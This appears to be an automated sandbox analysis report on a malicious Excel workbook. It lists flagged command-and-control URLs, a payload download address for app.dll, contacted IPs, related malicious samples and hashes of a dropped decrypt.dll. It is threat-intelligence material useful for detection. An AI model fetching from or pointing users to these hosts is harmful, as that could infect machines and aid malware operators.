http://gtr.antoinfer.com/7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/Vmn_2FfIBHwVISTOJqyyE/yxzQpB4UhTtBihgn/15wt67RuhdWC2bp/AA4QTb7hSSc7ibwOLz/pdYBrbn9P/IhNkxf132wscOBr5M107/x3K_2BnAOaEK3ZrGH_2/BhQbh5Iq3KL0HGqeYocdUa/aitTSocVb3Ei8/K8Yn7wxH/8ZzNnAARdlf1lpPkD_2FTSI/88hMX1xgXx/WKheFQm4ijbivR_2F/Zqk2tiAD1SrE/7_2FLrw5q4N/ROSXMe9TmWNzIt/lpE2Vas7vRgwYKuDJRzfN/M8anWcq	true	Avira URL Cloud: safe	unknown
http://gtr.antoinfer.com/k_2Bld_2B868iR7p/iSLerqiJRFRfRPj/I3sykOYq_2B_2BHlkm/lN1n6_2F_/2BoCebPKrVZFk5Ykbc8d/ir2ifxTr4LNwVXB57AO/naMzNC0NRqAZpafqf_2BA_/2Be4kMQ_2Bs4v/p3vimkya/tnJRXZOQhgPrD4eJIIoOBmz/6_2FqS0VmH/GdEp4ZZJMOcj3fIll/Gr7XyTEKPabp/aWzveP_2B5R/CbkrZ6KMbYewce/4JBfvb8ftJcY5XJZOep1x/uKyVwvTYfdKUGuNG/Emm_2BOgQKRpwFp/DFm1TypwhIB6euZx4o/ZnwoOdebK/P2zkNdJ1mC1FOPRaBbHj/tGtvylAtqDtqZZGz2/K	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/dateofbirthrhttp://schemas.xmlsoap.org/ws/2005	csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp	false		high
https://api.diagnosticssdf.office.com	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://login.microsoftonline.com/	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://shell.suite.office.com:1443	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorize	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
http://gtr.antoinfer.com/h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gareL3qIH	{7879BAAC-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr	true	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/emailaddressxhttp://schemas.xmlsoap.org/ws/200	csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp	false		high
https://autodiscover-s.outlook.com/	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=Flickr	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://cdn.entity.	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://gtr.antoinfer.com/k_2Bld_2B868iR7p/iSLerqiJRFRfRPj/I3sykOYq_2B_2BHlkm/lN1n6_2F_/2BoCebPKrVZFk	{7879BAA6-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr, ~DFA7B5BF1FB774EA36.TMP.28.dr	true	Avira URL Cloud: safe	unknown
https://api.addins.omex.office.net/appinfo/query	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://clients.config.office.net/user/v1.0/tenantassociationkey	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://powerlift.acompli.net	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://rpsticket.partnerservices.getmicrosoftkey.com	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://lookup.onenote.com/lookup/geolocation/v1	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://cortana.ai	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/stateorprovince	csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp	false		high
https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
http://gtr.antoinfer.com/7lD6H27N_2/BPcjmtAv0Zw4YWBW5/_2Fxf1uK6WCO/_2Fjr90UDnf/fvsahgiWLN_2Bo/Vmn_2F	{5DCD6FF8-E03E-11EB-90E4-ECF4BB862DED}.dat.23.dr, ~DF99BD870E81A4914B.TMP.23.dr	true	Avira URL Cloud: safe	unknown
http://gtr.antoinfer.com/xFDxUxdbnv/F6OYsZZ54L9nW_2Fn/67TmggSh_2FJ/XC_2BJ4ptUf/_2Bn4_2BufrBke/X9TaUV	{7879BAA4-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr, ~DF436C4ACF406520B7.TMP.28.dr	true	Avira URL Cloud: safe	unknown
https://cloudfiles.onenote.com/upload.aspx	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://entitlement.diagnosticssdf.office.com	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicy	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authentication	csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp	false		high
https://api.aadrm.com/	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://ofcrecsvcapi-int.azurewebsites.net/	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/x500distinguishednamejhttp://schemas.xmlsoap.o	csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysid	csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/authorizationdecisionzhttp://schemas.xmlsoap.o	csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp	false		high
https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPolicies	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://api.microsoftstream.com/api/	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=Immersive	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://cr.office.com	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://portal.office.com/account/?ref=ClientMeControl	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000025.00000002.587720869.0000028658461000.00000004.00000001.sdmp, powershell.exe, 00000027.00000002.589665519.000002B5AD541000.00000004.00000001.sdmp	false		high
http://www.reddit.com/	msapplication.xml4.23.dr	false		high
http://gtr.antoinfer.com/IW0KvL6zqxcwdal5Ue/sV05YuqDL/CUY_2FYXWgTEAN2MleRL/cOthmAfIFOrxcxXsh59/	regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://graph.ppe.windows.net	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://res.getmicrosoftkey.com/api/redemptionevents	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://powerlift-frontdesk.acompli.net	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://tasks.office.com	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://officeci.azurewebsites.net/api/	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false	Avira URL Cloud: safe	unknown
https://sr.outlook.office.net/ws/speech/recognize/assistant/work	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameidentifier	csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp	false		high
https://free.mynowministries.com/app.dll	close.xml	false	Avira URL Cloud: safe	unknown
http://gtr.antoinfer.com/MpeUKSeGn_2/Bk4DEtluQu8Y9R/36MpR_2BhUMN_2FXN2dO6/hANnmINzHP5reb6i/6KJxoqvLx	{7879BAA8-E03E-11EB-90E4-ECF4BB862DED}.dat.28.dr	true	Avira URL Cloud: safe	unknown
https://store.office.cn/addinstemplate	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000025.00000002.594457896.000002865866F000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000025.00000002.594457896.000002865866F000.00000004.00000001.sdmp	false		high
https://outlook.office.com/autosuggest/api/v1/init?cvid=	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://globaldisco.crm.dynamics.com	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
http://gtr.antoinfer.com/h_2F93afXj4zv0agU5uGcex/4RttysT472/M4H0F6I1ZWhRsl9Mq/gKfk1C7c8_2F/gare	regsvr32.exe, 00000003.00000002.590086971.0000000002FD0000.00000002.00000001.sdmp, regsvr32.exe, 00000013.00000002.585926396.0000000003640000.00000002.00000001.sdmp, powershell.exe, 00000025.00000002.586261985.0000028656DD0000.00000002.00000001.sdmp, powershell.exe, 00000027.00000002.585702910.000002B5ABD70000.00000002.00000001.sdmp, csc.exe, 0000002F.00000002.583539215.000001E9AEB40000.00000002.00000001.sdmp, csc.exe, 00000030.00000002.583966297.0000021D92F30000.00000002.00000001.sdmp	true	Avira URL Cloud: safe	unknown
https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://store.officeppe.com/addinstemplate	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://dev0-api.acompli.net/autodetect	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.odwebp.svc.ms	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://api.powerbi.com/v1.0/myorg/groups	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://web.microsoftstream.com/video/	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://graph.windows.net	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://dataservice.o365filtering.com/	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000025.00000002.594457896.000002865866F000.00000004.00000001.sdmp	false		high
https://officesetup.getmicrosoftkey.com	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://analysis.windows.net/powerbi/api	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://prod-global-autodetect.acompli.net/autodetect	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://outlook.office365.com/autodiscover/autodiscover.json	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
http://www.youtube.com/	msapplication.xml7.23.dr	false		high
https://ncus.contentsync.	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://onedrive.live.com/about/download/?windows10SyncClientInstalled=false	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
http://weather.service.msn.com/data.aspx	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://apis.live.net/v5.0/	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asks	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://autodiscover-s.outlook.com/autodiscover/autodiscover.xml	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://management.azure.com	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://wus2.contentsync.	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://incidents.diagnostics.office.com	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://clients.config.office.net/user/v1.0/ios	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://insertmedia.bing.office.net/odc/insertmedia	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://o365auditrealtimeingestion.manage.office.com	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://outlook.office365.com/api/v1.0/me/Activities	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://api.office.net	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://incidents.diagnosticssdf.office.com	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://asgsmsproxyapi.azurewebsites.net/	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false	Avira URL Cloud: safe	unknown
https://clients.config.office.net/user/v1.0/android/policies	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
http://www.amazon.com/	msapplication.xml.23.dr	false		high
https://entitlement.diagnostics.office.com	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
http://www.twitter.com/	msapplication.xml5.23.dr	false		high
https://substrate.office.com/search/api/v2/init	3A4E1985-998D-4759-B374-77BB71813A62.1.dr	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/streetaddresszhttp://schemas.xmlsoap.org/ws/20	csc.exe, 0000002F.00000002.586905440.000001E9B0DB0000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
162.241.253.78	free.mynowministries.com	United States		46606	UNIFIEDLAYER-AS-1US	false
165.232.183.49	gtr.antoinfer.com	United States		22255	ALLEGHENYHEALTHNETWORKUS	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	445916
Start date:	08.07.2021
Start time:	15:44:17
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	documentation_39236.xlsb
Cookbook file name:	defaultwindowsofficecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	49
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.troj.expl.evad.winXLSB@31/52@7/2
EGA Information:	Successful, ratio: 50%
HDC Information:	Successful, ratio: 88% (good quality ratio 83.6%) Quality average: 79.8% Quality standard deviation: 29.3%
HCA Information:	Successful, ratio: 100% Number of executed functions: 89 Number of non-executed functions: 39
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .xlsb Found Word or Excel or PowerPoint or XPS Viewer Attach to Office via COM Scroll down Close Viewer
Warnings:	Show All Max analysis timeout: 220s exceeded, the analysis took too long Exclude process from analysis (whitelisted): MpCmdRun.exe, RuntimeBroker.exe, backgroundTaskHost.exe, audiodg.exe, BackgroundTransferHost.exe, ielowutil.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 52.255.188.83, 52.147.198.201, 104.43.193.48, 52.109.76.68, 52.109.8.25, 52.109.8.23, 20.82.209.183, 92.122.144.200, 40.112.88.60, 23.55.110.38, 23.55.110.6, 51.103.5.186, 20.50.102.62, 95.101.22.216, 95.101.22.224, 2.18.105.186, 152.199.19.161, 20.72.88.19 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, prod-w.nexus.live.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, consumerrp-displaycatalog-aks2eap-europe.md.mp.microsoft.com.akadns.net, e11290.dspg.akamaiedge.net, iecvlist.microsoft.com, eus2-consumerrp-displaycatalog-aks2aks-useast.md.mp.microsoft.com.akadns.net, wns.notify.trafficmanager.net, go.microsoft.com, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, arc.trafficmanager.net, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, client.wns.windows.com, fs.microsoft.com, ie9comview.vo.msecnd.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, skypedataprdcolcus15.cloudapp.net, skypedataprdcoleus16.cloudapp.net, ris.api.iris.microsoft.com, skypedataprdcoleus17.cloudapp.net, config.officeapps.live.com, blobcollector.events.data.trafficmanager.net, go.microsoft.com.edgekey.net, europe.configsvc1.live.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net, cs9.wpc.v0cdn.net Execution Graph export aborted for target mshta.exe, PID 3128 because there are no executed function Execution Graph export aborted for target mshta.exe, PID 5780 because there are no executed function Not all processes where analyzed, report is missing behavior information Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
15:46:12	API Interceptor	1x Sleep call for process: regsvr32.exe modified
15:47:49	API Interceptor	45x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
165.232.183.49	3a94.dll	Get hash	malicious	Browse	gtr.antoinfer.com/favicon.ico
	3b17.dll	Get hash	malicious	Browse	gtr.antoinfer.com/favicon.ico
	9b9dc.dll	Get hash	malicious	Browse	gtr.antoinfer.com/favicon.ico

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
gtr.antoinfer.com	3a94.dll	Get hash	malicious	Browse	165.232.183.49
	3b17.dll	Get hash	malicious	Browse	165.232.183.49
	9b9dc.dll	Get hash	malicious	Browse	165.232.183.49

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
UNIFIEDLAYER-AS-1US	Baimex srl Enquiry.xlsx	Get hash	malicious	Browse	162.241.75.144
	P.O 09483938.doc	Get hash	malicious	Browse	192.185.24.91
	NWMEaRqF7s.exe	Get hash	malicious	Browse	162.241.242.173
	audit-1007245983.xlsb	Get hash	malicious	Browse	162.144.229.210
	SecuriteInfo.com.Trojan.Win32.Save.a.21204.exe	Get hash	malicious	Browse	192.185.24.91
	INVOICE_070621_PDF.exe	Get hash	malicious	Browse	192.185.164.148
	Invoice_7734.exe	Get hash	malicious	Browse	192.185.164.148
	Rq0Y7HegCd.exe	Get hash	malicious	Browse	162.241.62.54
	Banco Santander Copia de pago.doc	Get hash	malicious	Browse	162.144.79.7
	PO_0187.exe	Get hash	malicious	Browse	162.241.218.79
	SecuriteInfo.com.TrojanSpy.MSIL.AgentTesla.ee9ddc65.25172.exe	Get hash	malicious	Browse	192.185.164.148
	SWIFT Ref No TT 00189330982 pdf.exe	Get hash	malicious	Browse	192.185.171.219
	Invoice_1980.exe	Get hash	malicious	Browse	192.185.164.148
	Ordine 6809 020621.exe	Get hash	malicious	Browse	108.167.141.137
	Gift Card 0796907.xlsb	Get hash	malicious	Browse	162.144.57.183
	Gift Card 0796907.xlsb	Get hash	malicious	Browse	162.144.57.183
	Gift Card 0796907.xlsb	Get hash	malicious	Browse	162.144.57.183
	Gift 7333663.xlsb	Get hash	malicious	Browse	162.241.96.85
	vv.xlsb	Get hash	malicious	Browse	162.214.186.5
	vv.xlsb	Get hash	malicious	Browse	162.214.186.5
ALLEGHENYHEALTHNETWORKUS	grezVgW6gx.exe	Get hash	malicious	Browse	165.232.181.86
	rixXmiPteY.exe	Get hash	malicious	Browse	165.232.181.86
	ibj3mCisBP.exe	Get hash	malicious	Browse	165.232.181.86
	3a94.dll	Get hash	malicious	Browse	165.232.183.49
	3b17.dll	Get hash	malicious	Browse	165.232.183.49
	9b9dc.dll	Get hash	malicious	Browse	165.232.183.49
	sMpor4yDdu.exe	Get hash	malicious	Browse	165.232.177.150
	WesYhOA67u.exe	Get hash	malicious	Browse	165.232.177.148
	06LzL8skNz.exe	Get hash	malicious	Browse	165.232.183.193
	Jt8zMQzDO2.exe	Get hash	malicious	Browse	165.232.183.193
	WCPcSoW6ZI.exe	Get hash	malicious	Browse	165.232.184.56
	VD4V1nD2qq.exe	Get hash	malicious	Browse	165.232.184.56
	PDFXCview.exe	Get hash	malicious	Browse	165.232.56.100
	Quote.exe	Get hash	malicious	Browse	165.232.56.241
	SyfoFC5d21.exe	Get hash	malicious	Browse	165.232.110.48
	RNM56670112.exe	Get hash	malicious	Browse	165.232.36.60
	RRUY44091239.exe	Get hash	malicious	Browse	165.232.36.60
	http://165.232.53.33/chrgoo/index.html	Get hash	malicious	Browse	165.232.53.33
	exploit.doc	Get hash	malicious	Browse	165.232.122.138
	Information_1598546901.doc	Get hash	malicious	Browse	165.232.71.161

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	TFfv4hD2jx.exe	Get hash	malicious	Browse	162.241.253.78
	8L621QxNHv.exe	Get hash	malicious	Browse	162.241.253.78
	fG9WW97ssF.exe	Get hash	malicious	Browse	162.241.253.78
	DHL_PACKAGE_HD98232.pdf.exe	Get hash	malicious	Browse	162.241.253.78
	Satinalma Siparisi Listesi.exe	Get hash	malicious	Browse	162.241.253.78
	po4rKwQaet.exe	Get hash	malicious	Browse	162.241.253.78
	BcpljzRiWJ.exe	Get hash	malicious	Browse	162.241.253.78
	Mh2FzBrd3m.exe	Get hash	malicious	Browse	162.241.253.78
	nanomalware.doc	Get hash	malicious	Browse	162.241.253.78
	bDemJQO51z.xlsb	Get hash	malicious	Browse	162.241.253.78
	Ih5baTrZim.exe	Get hash	malicious	Browse	162.241.253.78
	Cmh_Fax-Message-3865.html	Get hash	malicious	Browse	162.241.253.78
	Jhy2YPMShA.exe	Get hash	malicious	Browse	162.241.253.78
	Copie de plata bancara.exe	Get hash	malicious	Browse	162.241.253.78
	Copie de plata bancara.exe	Get hash	malicious	Browse	162.241.253.78
	FAX.HTML	Get hash	malicious	Browse	162.241.253.78
	3MIvJieGXT.exe	Get hash	malicious	Browse	162.241.253.78
	audit-1007245983.xlsb	Get hash	malicious	Browse	162.241.253.78
	ztr3AvK8Oq.exe	Get hash	malicious	Browse	162.241.253.78
	tCgQxi2KmS.exe	Get hash	malicious	Browse	162.241.253.78

Dropped Files

No context

Created / dropped Files

C:\Users\Public\Documents\decrypt.dll Download File
Process:	C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	455680
Entropy (8bit):	6.751938575699122
Encrypted:	false
SSDEEP:	12288:AmYDWUbdfyU+H93bJ3aBGQIuSR35F5VBpx:yBbdfJsJqBG5VB/
MD5:	F3BE390B01C85970DEEAE124CA36CE2D
SHA1:	93114ECF1B2C711EC10E1FAFDC834393EFC11A97
SHA-256:	4EEF8B6A5BCD808CD0AB0E33EFCEA2C2F9A36ABE556E56556DE8550383C9D3CE
SHA-512:	463829E0A07A2983D967483D49DD478243658C0BE583BCDDB801CD45BEB869EEE8CDA812EA3A74E5CF5D70BE07B5A59677317DBADCEFDB8A21DE3DDCBE7FA3A6
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......S....z.X.z.X.z.XL..Y.z.XL..Y.z.XL..Y.z.X...Y.z.X...Y.z.X...Y6z.X..kX.z.X.z.Xcz.X...Y.z.X...Y.z.X...Y.z.XRich.z.X................PE..L......^...........!................7.....................................................@.................................@................................p...#......T........................... ...@............................................text............................... ..`.rdata..p...........................@..@.data...............................@....reloc...#...p...$..................@..B................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{5DCD6FF6-E03E-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	29272
Entropy (8bit):	1.7715078128206818
Encrypted:	false
SSDEEP:	48:Iw+Gcpr7GwpLN8G/ap8NYGIpcN8UGvnZpvN8WGo6qp9N8hGo4NpmN8gGWwAQGWaj:riZVZN+2N4WN8dtN84fN8SNMN8tUNrjB
MD5:	AAFD082475A3FA2768778183CEE2850E
SHA1:	F6608B80EAF7233A50DDF1375EAE827300F5E0A0
SHA-256:	D114B9D0DA99FE585A9C15EF071D74FF7DBC739819CB702371A53C100CB3220A
SHA-512:	9A48AC75962D7FB09926080A8757036B0BBD47D915ED41DE9825C6D9A628A5FB45E342575EDCD41C4FBC39612C888E36DAB32F1ED2E4C63E3E7082FA117A976B
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{7879BAA2-E03E-11EB-90E4-ECF4BB862DED}.dat Download File
Process:	C:\Program Files\internet explorer\iexplore.exe
File Type:	Microsoft Word Document
Category:	dropped
Size (bytes):	120168
Entropy (8bit):	2.2535850030479416
Encrypted:	false
SSDEEP:	384:rgHHJMv0eUkzYfIf3pVsllhb75NLcCs6EVMLTATOz:ZvzElZro+
MD5:	AF5C812B4D9A09EEBEEFBE547FCD3844
SHA1:	DB30A7DF7E8CBA0F3635E06DE6575C695B10AB0F
SHA-256:	E59951BB01F1D2DBB55BDE471FA7CCB363E9879EDB5032AA7E3588D92205FA7E
SHA-512:	F4F2E4EADB40BE3719373C0E3A88FB0B620234AF9325036472D4C282D586187CFCF82FAFF5EEBF53AD59DE16170546F116799C231D4B1273525A59B947503E84
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................R.o.o.t. .E.n.t.r.y.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

